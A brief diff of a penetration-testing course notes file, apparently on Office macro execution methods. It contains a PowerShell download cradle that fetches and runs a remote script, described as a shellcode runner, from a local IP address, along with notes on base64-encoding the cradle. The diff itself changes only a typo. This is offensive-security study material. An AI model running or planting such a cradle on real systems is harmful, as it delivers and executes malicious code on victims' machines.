trike33/PEN-300-Code-Snippets/Macro execution methods.md

 IEX(New-Object System.Net.WebClient).downloadString('http://192.168.1.1/run.ps1')

 The run.ps1 file is a powershell shellcode runner.
-Due to the complexity of this technique, we will base64 encode our PowerShell download cradle ass follows:
+Due to the complexity of this technique, we will base64 encode our PowerShell download cradle as follows:
 ~# pwsh
 ❯ pwsh
 PowerShell 7.2.1